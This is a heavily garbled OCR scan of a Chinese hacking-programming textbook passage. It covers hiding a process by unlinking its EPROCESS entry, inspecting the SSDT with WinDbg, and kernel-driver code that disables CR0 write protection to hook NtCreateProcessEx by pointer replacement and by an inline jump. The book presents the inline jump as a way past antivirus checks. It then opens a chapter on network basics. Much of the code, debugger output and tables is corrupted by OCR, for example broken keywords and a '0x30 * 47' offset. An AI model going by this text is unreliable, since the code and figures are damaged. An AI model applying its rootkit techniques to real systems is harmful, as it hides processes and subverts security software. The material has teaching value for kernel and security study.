pEprocess = PsGetCurrentProcess(); 


if ( PEprocess == 0 ) 

{ 
KdPrint( ("PsGetcurrentProcess Error ! NENnn) DJ 7 
roetirn" STATUS SUCCRESS; 

} 


BEirstEprocess, = pEprocess; 


while ( pEprocess != NULL ) 
{ 
ulPprocessName = (ULONG)pPEpProcess + 0x174; 
ulProcessId = *(ULONG *) ((ULONG)PpEprocess + OQx84); 
KdPrint( ("ProcessName, = %s, Processld = %d \r\n", ulPprocessName, ulProcess1d)); 


BEprocess = (ULONG)'( *{ULONG *) ((ULONG)PEprocess + 0x88) - 0x88); 
if ( pEprocess == pFirstEprocess || (*(LONG *) ((LONG)pEprocess + 0x84)) < 0 ) 
{ 

break 7 


} 


Yeturn STATHSLSUCCESS; 


} 
代码 中 用 到 了 一 个 函数 ， 就 是 PsGetCurrentProcess()。 这 个 函数 是 用 来 获取 当前 进程 的 
EPROCESS 指针 的 ， 其 定义 如 下 : 








党 瑾 齐 将 沿革 啊 钼 ”山上 小 
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CS 
SA 


PEPROCESS PsGetCurrentProcess (VOLID); 


通过 PsGetCurrentProcess() 函 数 获得 的 是 system 进程 的 EPROCESS， 大 多 数 内 核 模式 系 
统 线程 都 在 system 进程 中 。 除 了 这 个 函数 没有 接触 过 以 外 ， 剩 下 的 部 分 就 是 对 EPROCESS 
结构 体 的 操作 ， 这 里 不 做 过 多 的 介绍 。 前 面 的 章节 中 介绍 过 如 何 实现 进程 内 DLL 文件 的 隐藏 ， 
方法 是 将 指定 DLL 在 DLL 链表 中 “ 脱 链 ” 为 了 隐藏 进程 ， 同 样 可 以 将 指定 进程 的 EPROCESS 
结构 体 在 进程 链表 中 “ 脱 链 ”， 以 达到 隐藏 的 目的 。 











8.7 HOOK SSDT 


8.7.1 SSDT 


前 面 介 绍 了 如 何 编写 简单 的 驱动 程序 ， 这 一 节 将 介绍 内 核 下 的 一 张 非常 有 用 的 表 。 很 多 
游戏 保护 系统 中 ， 或 一 些 杀毒 软件 中 ， 都 会 对 该 表 进 行 修改 ， 从 而 改变 系统 函数 调用 流程 来 
起 到 反 外 挂 、 反 病毒 的 作用 。 同 样 ， 病 毒 也 在 修改 该 表 ， 从 而 修改 系统 函数 调用 流程 来 完成 
其 自身 的 目的 。 这 张 非常 关键 的 表 叫 作 SSDT， 即 System Service Descriptor Table〈 系 统 服 务 
描述 表 )。 这 张 表 的 作用 是 把 用 户 层 的 Win32 API 和 内 核 层 的 API 建立 一 个 关联 。 在 该 表 中 
维护 非常 多 Native API， 或 称 本 地 API。 下 面 通过 WinDbsg 来 查看 该 表 。 

依照 前 面 的 方法 ， 使 用 WinDbg 连接 到 虚拟 机 上 ， 然 后 在 命令 提示 符 处 输入 dd 
KeServiceDescriptorTable 命令 ， 会 得 到 一 些 十 六 进 制 的 输出 。KeServiceDescriptorTable 是 
Ntoskrnl.exe 导出 的 一 个 指针 ， 用 来 指向 SSDT 表 。 下 面 来 查看 命令 的 输出 结果 ; 


kd> dd KeServiceDescriptorTable 
80553fa0 80502b8c 00000000 0000011c 80503000 














80553fb0 00000000 00000000 00000000 00000000 
80553fc0 00000000 00000000 00000000 00000000 
80553fd0 00000000 00000000 00000000 00000000 
80553fe0 00002710 bf80c0Bb6 00000000 00000000 
86553KT0 fcl42a80 80e29d890 80cee0t0 80682F40 
80554000 00000000 00000000 cl69a786 00009a34 
80554010 3beablcé6 01lce052a 00000000 00000000 


在 该 输出 中 ,第 一 行 就 是 SSDT 表 , 该 表 中 的 80502b8c 是 一 个 函数 指针 数组 ， 该 指针 数 
组 保存 了 所 有 Native API 的 函数 地 址 ，0000011c 是 数组 的 大 小 ，80503000 里 面 保 存 的 是 一 个 
参数 个 数 数组 ， 与 Native API 相对 应 。 将 SSDT 定义 成 一 个 结构 体 ， 有 具体 如 下 : 


typedef streuct SERVICE DESCRIPTOR TABLE 
: 


PULONG ServiceTableBase; 
PULONG Reseave; 
ULONG NumberOfServyices; 
PUCHAR ParamTableBase; 
}SERVICE DESCRIPTOR TABLE, ‘*PSERVICE DESCRIPTOR TABLE; 


要 想 在 驱动 中 获得 该 表 ， 需 要 使 用 Notokrl.exe 导出 的 KeServiceDescriptorTable， 将 其 
定义 如 下 : 

extern PSERVICE DESCRIPTOR TABLE KeServiceDescriptorTable, 

有 了 上 面 的 SSDT 表 和 KeServiceDescriptorTable 的 定义 ， 就 可 以 编写 与 SSDT 相关 的 程 
序 了 ， 不 过 似乎 还 少 点 什么 。 表 里 面 对 应 的 Native API 到 底 是 什么 ? 用 WinDbg 来 看 一 下 ， 
输入 dd 80502b8c， 输 出 结果 如 下 : 








8.7 HOOK SSDT 





kd> dd 80502b8c¢ 

80502b8c 8059a948 805e7db6 805eb5fc 805e7de8 
80502b9c 805eb636 805e7ele 805eb67a 805eb6be 
80502bac 8060cdfe 8060db50 805e31b4 805e2e0c 
80502bbc 805cbde6 805cbd96 8060d424 805ac5ae 
80502bcc ‘8060ca3c 8059edbe 805a6a00 805cd8c4 
80502Bde 80500828 8060db42 8056ccd6 8053600e 
80502bec 806060d4 805b2c3a 805ebb36 806lae56 
80502bfc ‘805£0028 8059b036 806lb0aa 8059a8e8 


全 都 是 一 些 地 址 值 比较 接近 的 函数 地 址 , 为 什么 说 是 函数 地 址 ? 因为 这 是 函数 指针 数组 。 


输入 u8059a948 命令 ， 输 出 如 下 : 
kd> uu 8059a948 
nt!iNtAcceptConnectPort: 


8059a948 689c000000 push 9ch 

8059a94Q 6838aldd80 push offset nt! real+0x128 (804dal38) 
8059a952 e8b9eSf9ff call nt!_ SEH prolog (80538f10) 

8059a957 64a124010000 mov eax, dword ptr fs:[00000124h] 

8059a95d 8a8040010000 ID 了 al,byte ptr [eax+l40hl] 

8059a963 884590 moOV byte ptr lebp= TO0njial 

8059a966 84c0 test al,al 

8059a968 0f84b9010000 je ntlNtAcceptConnectPort+0Oxldf (8059ab27) 


从 输出 可 以 看 出 ，8059a948 是 NtAcceptConnectPortO 函 数 的 地 址 。 再 来 看 一 个 地 址 ， 输 


入 u805e7db6 命令 ， 输 出 如 下 : 


kd> u 805e7db6 
nt!NtAccessCheck: 


805e7db6 8bff mo edi;edi 

805e7db8 55 push ebp 

805e7db9 8bec mov ebpresp 

805e7dbb 33c0 XoOr EAaX, ax 

805e7dbd 50 push eax 

805e7Tdbe ££7524 push dword ptr [ebp+24h] 
805e7dcl £f7520 push dword ptr [ebp+20h] 
805e7dc4 ff£f751¢ push dword ptr [ebp+1Ch] 


这 次 输出 的 是 NtAccessCheck() 函 数 的 反 汇 编 代 码 。 在 SSDT 表 中 ， 第 3 个 参数 表明 ， 这 
个 数组 的 大 小 是 0xllc,， 也 就 是 数组 最 后 一 项 的 下 标 是 0x11b。 再 来 看 下 标 为 0xllb 的 数组 项 
中 保存 的 地 址 是 多 少 。 输 入 命令 dd 80502b8c + 11b* 4，80502b8c 是 数组 的 起 始 地 址 ，11b 是 
数组 下 标 ， 那 么 乘 4 是 什么 原因 呢 ? 数组 地 址 的 定位 是 通过 数组 首 地 址 + 下 标 义 数组 元 素 字 
节 数 得 出 的 。 一 个 函数 的 地 址 占用 4 字 节 ， 因 此 要 做 乘 4 的 操作 。 该 命令 输出 如 下 : 


kd> dd /80502B86 + 1D * 4 

80502£f8 805c2798 0Q000001ic 2c2c2018 44402c40 
80503008 1818080c 0c040408 08081810 0808040c 
80503018 080c0404 2004040c 140c1008 0cl02c0c 
80503028 10201coc 20141038 141c2424 34102010 
80503038 080c0814 04040404 0428080c 1808181c 
80503048 1i808180c 040c080c 100c0010 10080828 
80503058 0c08041Ic 00081004 0c080408 10040828 
80503068 0c0c0404 28240428 0c0c0c30 0c0ec0ec18 


再 用 命令 来 查看 805c2798 处 的 反 汇 编 代 码 。 输 入 命令 u 805c2798， 输 出 如 下 : 
kd> u 805c2798 
nt!NtQueryPortIinformationProcess: 


805c2798 64al24010000 mOV eaxrdword ptr fs: [00000124h] 

805c279e 8b4844 mov ecx,dword ptr [eax+44h] 

805c27al 83b9bc00000000 cmp dGword ptr [ecx+0BCh],0 

805c27a8 740d je nt!NtQueryPortinformationProcess+0x1lf (805c27b7) 
805c27aa £f6804802000004 test byte ptr [eaxt+248h],4 

805c27b1 7504 jne nt!NtQueryPortInformationprocess+0xlf (805c2757) 
S05C27D3 33c0 OE eax, eax 

805c27b5 40 Ere eax 


数组 中 最 后 一 项 保存 的 是 NtQueryPortInformationProcess() 函 数 的 地 址 。 





山上 中 
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8.7.2 HOOK SSDT 


从 上 一 节 的 介绍 中 知道 ，SSDT 把 用 户 层 的 Win32 API 与 内 核 层 的 Native API 做 了 一 个 
关联 ， 而 整个 Native API 都 保存 在 SSDT 中 的 一 个 函数 指针 数组 中 ， 只 要 修改 函数 指针 数组 
中 的 某 一 项 ， 就 相当 于 HOOK 了 某 个 Native API 函数 。 比 如 ， 修 改 SSDT 中 函数 指针 数组 中 
的 最 后 一 个 函数 指针 ， 就 相当 于 HOOK 了 NtQueryPortInformationProcess() 函 数 。 

下 面 HOOK 一 个 比较 熟悉 的 函数 ， 即 创建 进程 函数 NtCreateProcessEx()。 该 函数 在 指针 
数组 的 第 0x30 项 (该 编号 根据 系统 版 本 的 不 同 而 不 同 , 是 系统 相关 的 )。 通 过 编程 获取 SSDT 
表 ， 然 后 找到 Native API 的 函数 指针 数组 ， 再 修改 其 中 第 0x30 项 的 内 容 为 自己 的 函数 地 址 。 
为 了 不 影响 进程 的 正常 创建 ， 在 函数 中 调用 NtCreateProcessEx0 函 数 。 代 码 如 下 : 


#include <ntddk.h> 


typedef struct _SERVICE DESCRIPTOR TABLE 
i 
PULONG ServiceTableBase; 
PULONG ServiceCounterTableBase; 
ULONG NumberOfServices,; 
PUCHAR ParamTableBase’; 
}SERVICE DESCRIPTOR TABLE, *PSERVICE DESCRIPTOR TABLE; 


extern PSERVICE DESCRIPTOR TABLE KeServiceDescriptorTable,; 


typedef NTSTATUS (*NTCREATEPROCESSEX) (PHANDLE, ACCESS MASK, POBJECT ATTRIBUTES, 
HANDLE, UELONG, HANDLE, HANDLE, HANDEE, ULONG); 


// 保存 NtCreateProcessEx 函数 的 地 址 
NTCREATEPROCESSEX ulNtCreateProcessEx = 0; 
// 在 指针 数组 中 NtCreateProcessEx 的 地 址 

ULONG ulNtCreateProcessExAddr = 0; 


VOID UN PROTECT() 


push eax 

mov eax, CRO 

and eax, OFFFEFFFFhN 
mov CRO, eax 

Pop eax 


} 


VOID RE PROTECT () 


push eax 

mo eazx, CRO 

or eax, OFFFEFFFFh 
mov CRO, eax 

PoP eax 


} 
VOID DriverUnload (PDRIVER OBJECT pDriverObject) 
{ 

UN._PROTECT (); 


// 蔡 换 NECreateErocessEx 的 地 址 为 MyNtCreateProcessEx 
* (PULONG) UINtCreatePprocessExAddr = (ULONG)ulNtCreateProcessEx; 





中 
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} 


RE _ PROTECT'();» 


NTSTATUS 

MyNtCreateProcessEx( 

_out PHANDLE ProcessHandle, 

_ in ACCESS MASK DesiredAccess, 
_ in opt POBJECT ATTRIBUTES ObjectAttributes, 
_ in HANDLE ParentProcess, 

in ULONG Flags; 

_ in opt HANDLE SectionHandle, 
in opt HANDLE DebugPort, 
in.opt HANDLE Exceptionport, 
_in ULONG JobMemberLevel 


) 
{ 


} 


NTSTATUS Status = STATUS SUCCESS; 
KdPrint( ("Enter MyNtCreateprocessEx! \r\n")); 


Status = ulNtCreateProcessEx (ProcessHandle, 
DesiredAccess, 
ObjectAttributes, 
ParentProcess, 
Flags; 
SectionHandle, 
DebugPort, 
ExceptionPort, 
UobMemberLevel); 


return status» 


VOID HookCreateProcess () 


{ 


} 


ULONG ulssdt = 0; 

// 保存 NtCreateProcess 的 地 址 

/4 获取 ssDT 

alSsdt = (UEONG)KeServiceDescriptorTable->ServiceTableBase; 


// 获取 NtcreateProcessEx 地 址 的 指针 

UlNtCreateProcessExAddr = ulSsdt + Ox30 * 47 

// 备份 NtCreateProcessEx 的 原始 地 址 

ulNtCreateProcessEx = (NTCREATEPROCESSEX) * (PULONG)ulNtCreatePprocessExAddr; 
UN_PROTECT (}; 


// 替换 NtCreateProcessEx 的 地 址 为 MyNtCreateProcessEx 
* (PULONG)uINtCreateProcessExAddr = (ULONG)MyNtCreateProcessEx; 


RE_PROTECT (); 


NTSTATUS DriverEntry'( 


} 


DriverEntry() 中 调用 了 HookCreateProcess() 函 数 ， 该 函数 的 作用 是 将 指针 数组 中 NtCreate 


PDRIVER OBJECT PpDriverObject, 
PUNICODE _ STRING pRegistryPath 
) 


NTSTATUS Status = STATUS SUCCESSS 
pDriverObject->DriverUnload = DriverUnload; 


HookCreateProcess () ; 


return SS 七 aa 七 tLS 
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尝 民 


ProcessEx0) 函 数 的 地 址 蔡 换 为 MyNtCreateProcessEx() 函 数 的 地 址 。 而 MyNtCreateProcessEx() 
函数 是 用 来 取代 NtCreateProcessEx(O) 函 数 的 函数 ， 在 这 里 的 函数 中 调用 了 一 条 KdPrint() 用 于 
输出 代码 。 整 个 HOOK 的 过 程 非常 简单 ， 只 要 找到 指针 数组 的 位 置 ， 保 存 原 地 址 后 修改 为 新 
的 地 址 即 可 。 代 码 中 出 现 了 两 个 函数 ， 分 别 是 UN_PROTECTO 和 RE PROTECTO。 这 两 个 函 
数 的 作用 是 禁止 和 开启 CPU 向 标志 为 只 读 的 内 存 页 进行 写 入 的 操作 。 执 行 UN_PROTECT 后 ， 
CPU 可 以 向 标志 为 只 读 的 内 存 页 进行 写 入 操作 。 当 写 入 完成 后 , 调用 RE_PROTECT() 函 数 恢 
复 到 原来 的 状态 。 把 它 放 到 虚拟 机 中 ， 打 开 DebugView， 然 后 加 载 该 驱动 ， 加 载 成 功 后 随便 
运行 一 个 可 执行 程序 。 可 以 看 到 ，DebugView 中 显示 了 在 MyNtCreateProcessEx() 中 的 输出 ， 
如 图 8-91 所 示 ， 说 明 HOOK 成 功 了 。 









nm Debug¥iew on WPC-201006101043 (local) 
File Edit Capture Dptions Computar Jalp 
让 站 历时 + 国 | 权臣 全 | 
杖 














Time Debug Print 


0 0,00000000 Enter WNtCreateProcessEx| 











图 8-91 MyNtCreateProcessEx() 函 数 的 输出 
bs 0 


8.7.3 Inline HOOK SSDT 


前 面 介绍 了 HOOK SSDT， 下 面 介绍 Inline HOOK SSDT。 为 什么 要 介绍 Inline HOOK 
SSDT 呢 ? 在 有 些 情况 下 ， 反 病毒 软件 会 保护 SSDT 不 受 算 改 ,其 保护 方式 是 检查 Native API 
的 函数 指针 数组 中 的 值 是 否 正 确 。 如 果 其 中 某 项 或 某 几 项 被 修改 ， 那 么 反 病 毒 软件 会 将 被 修 
改 的 项 恢复 到 原来 的 值 ， 这 样 HOOK SSDT 就 不 成 功 了 。 还 记得 前 面 章节 介绍 的 Inline HOOK 
原理 吗 ? Inline HOOK 是 修改 被 HOOK 的 入 口 字 节 为 一 个 跳 转 ， 从 而 跳 转 入 函数 中 。 如 果 换 
作 是 Inline HOOK SSDT 的 话 ， 那 么 就 不 会 去 修改 Native API 的 函数 指针 数组 中 的 值 了 ， 这 
样 可 以 避免 反 病毒 软件 的 检测 〈 注 : 这 只 是 一 个 简单 的 说 明 ， 现 在 使 用 Inline HOOK SSDT 
同样 会 被 反 病毒 软件 查 杀 )。 : 


实现 mline HOOK SSDT 的 代码 如 下 : 
typedef NTSTATUS (x*NTCREATEPROCESSEX) (PHANDLE, ACCESS MASK, POBJECT ATTRIBUTES, 
HANDLE, ULONG, HANDLE, HANDLE, HANDLE, ULONG); 





NTCREATEPROCESSEX ul2wCreateProcessEx = 0; // 原始 函数 地 址 
unsigned char bOldBytes[5]; /7 函数 入 口 代码 
unsigned char bNewBytes[5]; // Inline 代码 


VOID UninlineHookCreateProcess(); 
VOID ReInlineHookCreateProcess(); 


VOID DriverUnload (PDRIVER OBJECT pDriverObject) 
{ 

UninlineHookCreateProcess(); 
} 


NTSTATUS 
MyNtCreateProcessEx!( 
out PHANDLE ProcessHandle, 





中 
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_ in ACCESS MASK DesiredAccess, 

_in opt POBJECT ATTRIBUTES ObjectAttributes, 
in HANDLE ParentPprocess, 

_in ULONG Flags, 

_ in opt HANDLE SectionHandle, 

in opt HANDLE DebugPort, 

_in opt HANDLE ExceptionPort, 

_ in ULONG JobMemberLevel 


] 


NTSTATUS Status = STATUS SUCCESS 
KdPrint( ("Enter Inline MyNtCreateProcessEx! 


UnIinlineHookCreateProcess(); 


Status = ulZwCreateProcessEx(ProcessHandle, 
DesiredAccess, 
ObjectAttributes, 
ParentProcess, 
Flags, 
SectionHandle, 
DebugPort, 
ExceptionPort, 
JobMemberLevel): 


ReInlineHookCreatePprocess(); 


return Status’? 


VOID UnInlineHookCreateProcess'!() 


{ 


} 


UN_PROTECT (); 


NE NA 


RtlCopyMemory ( (PVOID) ulZwCreateProcessEx, (CONST PVOID)bOldBytes, 5S); 


RE_PROTECT ()> 


VOID RelinlineHookCreateProcess () 


{ 


} 


UN_PROTECT () ; 


RtiCopyMemory ( (PVOID)ulZwCreateProcessEx, (CONST PVOID)bNewBytes, 5); 


RE_PROTECT (); 


VOID InlineHookCreateProcess() 


{ 


ULONG ulSsdt = 0; 

// 保存 NtCreateProcessEx 的 地 址 
ULONG ulZwCreatePprocessExAddr = 0; 
/dsm Lt 3 


// 获取 SSDT 


ulssdet = (ULONG)KeServiceDescriptorTable->ServiceTableBase; 


// 获取 NtcreateProcessEx 地 址 的 指针 


UlZwCreateprocessExAddr = UlSsdt + 0x30 * 47 


// 备份 NtcreateProcessEx 的 原始 地 址 


ulZwCreateProcessEx = (NTCREATEPROCESSEX) * (PULONG)ulZwCreateProcessExAddr; 


// 备份 函数 前 5 字 节 


RtlCopyMemory'( (PVOID)bOldBytes, (CONST PVOID)ulZwCreatePprocessEx, 5); 


// 构造 入 口 跳 转 指 令 


407 
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bNewBytes[0] = '\xE9'; 77 jmp 指令 
* (PULONG) gbNewBytes[i] = (ULONG)MyNtCreateProcessEx - (ULONG)ulZwCreateProcessEx — 5; 
第 | 
| 
8 // 修改 函数 前 5 字 节 
章 RtlCopyMemory'( (PVOID)ulZwCreateProcessEx, (CONST PVOID)bNewBytes, 5) 7 
} 
二 NTSTATUS DriVerEntEY'( 
客 PDRIVER OBJECT pDriverObject, 
编 PUNICODE STRING pRegistryPath 
程 ) 
实 { 
例 NTSTATUS Status = STATUS SUCCESS; 
刘 | pDriverObject->DriverUnload = DriverUnload; 
析 UN_PROTECT(); 
InlineHookCreateProcess (); 
RE PROTPECT(); 
ees 


return Statusy 
} 


关于 代码 的 部 分 就 不 多 介绍 了 人 ， 测 试 一 下 ， 其 运行 结果 如 图 8-92 所 示 。 


[一 


Debugyiew on \\PC-201006101043 (iocal) 


File dit Capture Uptions Computer Help 

成 加 加 | 文才 ~ 油 | 民 节 写 | 可 时 | 的 
杂 Timne Debug Print 

0 0. 00000000 Enter Inline NyNtCreateProcessEx! 





图 8-92 Inline HOOK 


8.8 ”总 结 


本 章 以 实例 为 主 帮 助 读 者 进一步 掌握 前 面 所 学 到 的 知识 。 本 章 重 点 介绍 了 恶意 代码 、 扫 
描 器 、 病 毒 专 杀 等 工具 的 开发 。 观 其 技术 核心 ， 不 外 乎 是 前 面 所 学 知识 的 一 个 应 用 。 可 见 ， 
掌握 基础 知识 是 非常 重要 的 ， 希 望 本 章 的 实例 可 以 帮助 读者 将 前 面 所 学 的 知识 进行 融合 ， 达 
到 真正 掌握 前 面 基 础 知识 的 应 用 的 目的 。 
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前 面 的 章节 介绍 了 关于 Windows 系统 相关 的 编程 知识 ， 在 学 习 这 些 知识 的 同时 对 
Windows 操作 系统 也 有 了 一 定 的 熟悉 和 了 解 ， 比 如 进程 、 线 程 、PE 文件 结构 、 调 试 接口 等 知 
识 。 本 章 重 点 来 介绍 关于 网 络 安全 方面 的 内 容 ， 来 弥补 前 面 章节 对 网 络 方面 介绍 的 缺失 。 


9.1 网 络 安全 简介 


对 于 网 络 而 言 ， 每 个 人 有 每 个 人 的 理解 。 对 于 做 运 维 的 人 员 而 言 ， 网 络 可 能 指 的 是 路 由 
器 、 交 换 机 、 负 载 均衡 等 ， 对 于 做 开发 的 人 而 言 可 能 会 认为 是 基于 TCP/IP 协议 通信 的 软件 ; 
也 有 的 人 认为 网 络 就 是 Web、E-mail 等 互联 网 服务 。 对 于 网 络 安全 而 言 ， 有 的 人 认为 是 防火 
墙 ， 有 的 人 认为 是 杀毒 软件 。 各 有 各 的 认识 ， 对 于 每 个 人 的 认识 来 说 都 是 正确 的 。 本 节 就 来 
简单 地 讨论 网 络 和 网 络 安全 的 基础 知识 。 


9.1.1 网 络 与 网 络 安全 的 简单 介绍 


在 一 些 教材 里 ， 网 络 分 为 通信 子 网 和 资源 子 网 ， 通 信子 网 负责 网 络 数据 的 传递 ， 资 源 子 
网 提供 信息 、 数 据 等 服务 。 在 通信 子 网 当中 需要 工作 的 就 是 路 由 器 、 交 换 机 等 设备 。 而 在 资 
源 子 网 当中 ， 主 要 就 是 一 些 主机 (服务 器 )， 比 如 Web 服务 器 、 数 据 库 服务 器 等 。 当 然 了 ， 
在 网 络 的 末端 上 还 有 许多 的 终端 接 入 设备 ， 比 如 手机 、PC、 笔 记 本 电脑 等 。 

对 于 网 络 安全 而 言 ， 根 据 网 络 结构 的 不 同 或 网 络 的 区 域 不 同 所 涉及 的 网 络 安 全 防护 也 有 
所 不 同 。 

在 网 络 的 入 口 处 会 部 署 防火 墙 来 隔离 一 些 访问 ， 如果 内 部 局 域 网 较 大 ， 那 么 也 需要 防火 
墙 来 将 局 域 网 划分 为 多 个 不 同 的 区 域 ， 不 同 的 区 域 有 不 同 的 权限 ， 各 个 区 域 之 间 是 否 可 以 通 
信也 由 防火 墙 的 规则 来 确定 。 

在 局 域 网 中 的 某 个 区 域 中 可 能 是 对 外 提供 的 服务 ， 比 如 提供 了 Web 服务 , 那么 对 于 Web 
服务 而 言 ， 就 需要 接 入 配置 其 他 的 防护 系统 ， 比 如 WAF (Web Application Firewall) 和 ADS 
(Anti DDoS System)， 它 们 可 以 对 流量 进行 清洗 ， 也 可 以 定义 限制 Web 访问 URL 的 规则 等 。 
WAF 是 抵御 SQL Injection、XSS、CSRF 等 Web 攻击 的 ，ADS 是 防御 DDoS、CC 等 拒绝 服 
务 攻击 的 。 对 于 Web 而 言 ， 还 需要 防 算 改 系 统 ， 以 免 Web 页 面 被 非法 算 改 。 

在 局 域 网 中 一 定 有 终端 接 入 的 办 公 网 络 区 域 ， 对 于 办 公 的 终端 接 入 而 言 也 是 需要 一 定 的 
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安全 防护 的 。 比 如 ， 可 以 安装 企业 版 的 杀毒 软件 、 安 装 终端 管控 系统 ， 这 些 都 是 在 终端 的 系 
统 上 安装 运行 的 软件 。 也 可 以 在 交换 机 上 进行 IP 地 址 和 MAC 地 址 的 绑 定 ， 从 而 更 进一步 地 
对 网 络 的 访问 进行 管控 。 

在 这 里 笔者 介绍 的 内 容 也 是 相对 片面 的 , 这 里 只 是 想 说 明 , 网 络 安全 中 根据 环境 的 不 同 ， 
所 涉及 的 安全 设备 、 安 全 软件 也 不 相同 ， 它 是 一 个 相对 复杂 的 内 容 ， 这 里 只 是 给 读者 一 个 概 
念 环境 上 的 概念 而 已 。 其 次 ， 在 网 络 环境 中 ， 即 使 有 了 防火 墙 、ADS、WAF、 杀 毒 软件 等 安 
全 防护 软件 ， 为 什么 网 络 仍然 不 是 绝对 安全 的 呢 ? 因为 ， 安 全 是 一 个 整体 的 解决 方案 ， 不 是 
只 是 用 设备 、 防 护 系 统 堆 切 起 来 就 可 以 有 效 解决 安全 问题 的 。 而 且 攻防 对 抗 本 来 就 是 一 个 不 
对 称 的 博弈 方式 ， 对 于 防护 方 而 言 要 尽 可 能 地 全 面 ， 不 能 有 一 丝 一 训 的 松懈 ， 但 是 绝对 的 全 
面 又 很 难 做 到 ， 对 于 攻击 者 而 言 ， 是 不 需要 全 面 去 掌握 系统 整体 的 ， 而 是 尽 可 能 地 找到 系统 
的 一 处 薄弱 环节 即 可 ， 通 过 一 个 漏洞 去 摧毁 防御 方 的 整个 安全 防护 系统 。 

就 研究 黑客 编程 知识 而 言 , 我 们 更 关心 的 是 网 络 的 协议 、 系 统 漏洞 的 原理 等 相关 的 知识 ， 
只 要 有 这 些 相关 的 知识 ， 再 配合 相关 的 编程 知识 就 可 以 打造 一 系列 属于 自己 的 安全 工具 。 


9.1.2 网络 协议 基础 介绍 


网 络 的 通信 是 基于 协议 的 ， 对 于 了 解 网 络 的 读者 来 说 ， 可 能 听 说 过 最 多 的 就 是 OSI 参考 
模型 与 TCP/IP 协议 艇 。OSI 参考 模型 是 ISO 定义 的 一 套 协 议 模 型 ， 共 分 为 7 层 。 而 TCP/IP 
协议 是 一 个 4 层 模型 《有 文献 描述 为 5 层 ， 这 个 不 必 过 多 纠结 ， 了 解 其 本 质 就 可 以 了 )， 由 于 
TCP/P 协议 簇 的 形成 里 于 OSI 参考 模型 ， 所 以 成 为 了 工业 事实 上 的 标准 。 

1. OSI 模型 

在 互联 网 的 早期 各 个 硬件 厂商 有 各 自 的 网 络 通信 协议 ， 但 是 不 同 厂商 的 硬件 无 法 很 好 地 
互联 互通 ,因此 ISO 提出 和 定义 了 一 套 规范 , 即 OSI.OSI 是 Open System interconnect Reference 
Model 的 缩写 ， 即 开放 式 系统 互联 参考 模型 。 它 的 设计 目的 是 成 为 一 个 开放 网 络 互联 模型 ， 
来 解决 网 络 上 众多 的 网 络 模 型 所 带 来 的 互联 困难 和 低 效 型 。 

OSI 参考 模型 被 划分 为 7 层 ， 每 一 层 既 为 上 层 提供 服务 ， 又 被 下 层 服 务 ， 且 每 层 的 边界 








定义 非常 清晰 ， 而 且 各 层 功 能 不 会 重复 。OSI 参考 模型 分 层 如 表 9-1 所 示 。 
表 9-1 OSI 参考 模型 





功能 描述 
提供 应 用 程序 间 通 信 

处 理 数 据 格式 、 数 据 加 密 等 
建立 、 维 护 和 管理 会 话 
建立 主机 端 到 端的 连接 

寻 址 和 路 由 选择 

提供 介质 访问 、 链 路 管理 等 
比特 流传 输 


协议 数据 单元 〈PDU) 
应 用 层 协议 数据 单元 (APDU ) 
表示 层 协议 数据 单元 (PPDU) 表示 层 
会 话 层 协议 数据 单元 (SPDU) 会 话 层 
数据 段 (Segment) 传输 层 


数据 包 (Packet) 网 络 层 
数据 帧 (Frame) 




































































比特 〈Bit) 流 


“分 层 名 称 ” 是 OSI 7 层 参 考 模型 中 每 一 层 的 名 称 ,“ 协 议 数据 单元 ”是 每 一 层 的 单位 。 
对 于 上 三 层 而 言 ， 很 少 会 去 提 到 它们 的 单位 ， 下 四 层 的 单位 则 会 经 常 地 提 到 。 
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2. TCP/IP 协议 

OSI 是 由 ISO 定义 出 的 一 套 模型 标准 ， 而 在 互联 网 中 通信 的 事实 上 的 “标准 ”是 TCP/IP 
协议 ， 即 Transfer Control Protocol/Internet Protocol 协议 。TCP/P 协议 中 有 众多 的 协议 ， 而 其 
中 最 重要 的 两 个 协议 是 TCP 协议 和 IP 协议 ， 因 此 被 命名 为 了 TCP/IP 协议 。 

TCP/IP 协议 与 OSI 参考 模型 的 不 同 点 在 于 TCP/IP 协议 把 表示 层 和 会 话 层 都 归 入 了 应 
用 层 ， 把 物理 层 归 入 了 数据 链 路 层 。 因 此 ，TCP/IP 协议 是 一 个 4 层 的 协议 ， 在 部 分 参考 文 
献 或 书 中 , 物理 层 和 数据 链 路 层 是 分 开 的 , 这 点 只 需要 知道 即 可 。TCP/IP 协议 分 层 如 表 9-2 
所 示 。 


表 9-2 TCP/IP 协议 


对 应 OSI 分 层 描 述 
提供 应 用 程序 网 络 接 口 


















传输 层 


应 用 层 、 表 示 层 、 会 话 层 


HTTP、Telnet、 FTP、DNS 





网 络 层 网 络 层 寻 址 和 路 由 选择 IP、ICMP、ARP 
数据 链 路 层 、 物 理 层 物理 介质 访问 PPP、HDLC 





TCP/IP 协议 每 一 层 都 有 对 应 的 相关 协议 ， 它 们 都 为 完成 某 一 个 网 络 服务 而 产生 。 在 表 9-2 
中 列举 了 常见 的 协议 。 

在 TCP/IP 协议 中 一 个 较为 重要 的 概念 ， 被 称 为 套 接 字 。 在 第 2 章 中 介绍 WinSock 编程 
时 就 提 到 过 套 接 字 。 在 完成 一 次 通信 时 ， 需 要 确 “FeeeE protocol Version 4 src: 1977168.1.163, Dat 
定 源 IP 地 址 、 源 端口 号 、 目 的 IP 地 址 、 目 的 端 人 


:+ 8191 = Header Length: 29 bytes (5) 


口号 ， 以 及 双方 所 使 用 的 协议 ， 这 五 项 内 容 又 被 Differentiated Services Field: Ox88 (DSCP: 5SG6，ECN 


Total Length: 60 


称 为 五 元 组 。 协议 有 时 被 称 为 协议 号 ， 协议 号 不 Identification: Bx4p59 (19289) 


Flags: 9x99 


同 于 端口 号 ， 它 们 是 两 个 不 同 的 概念 。 协 议 号 是 “| feaenent orfset: 8 


对 上 层 所 用 协议 的 一 个 标识 。 使 用 Wireshark 抓 {validation disabled] 
包 查 看 具体 的 协议 号 ， 如 图 十 图 图 9-2 和 图 .3 Source: 192.168.1.193 





所 示 。 图 9-1 ICMP 协议 号 


» Internet Protocol Version 4, Src: 192.168.1.163， 
8166 .... = Version: 4 
:» 8101 = Header Length; 28 bytes (5) 
Differentiated Services Field: @x80 (DSCP: CS6 
Total Length: 498 
Identification: Ox217d (8573) 













1 Internet Protocol Version 4，Src: 192.168.1.103， 
8100 .... = Version: 4 
.... 16061 = Header Length: 20 bytes {5) 
Differentiated Services Field: 8x80 (DSCP; CS! 
Total Length: 99 
Identification:; Ox2d5f (11615) 
Flags: 0x60 
Fragment offset: 6 
Time to live: 64 
Protocol: UDP {17) 
Header checksum: 8x141e [validation disabled] 
Source; 192.168.1.163 


Flags: 0x02 (Don't Fragment) 
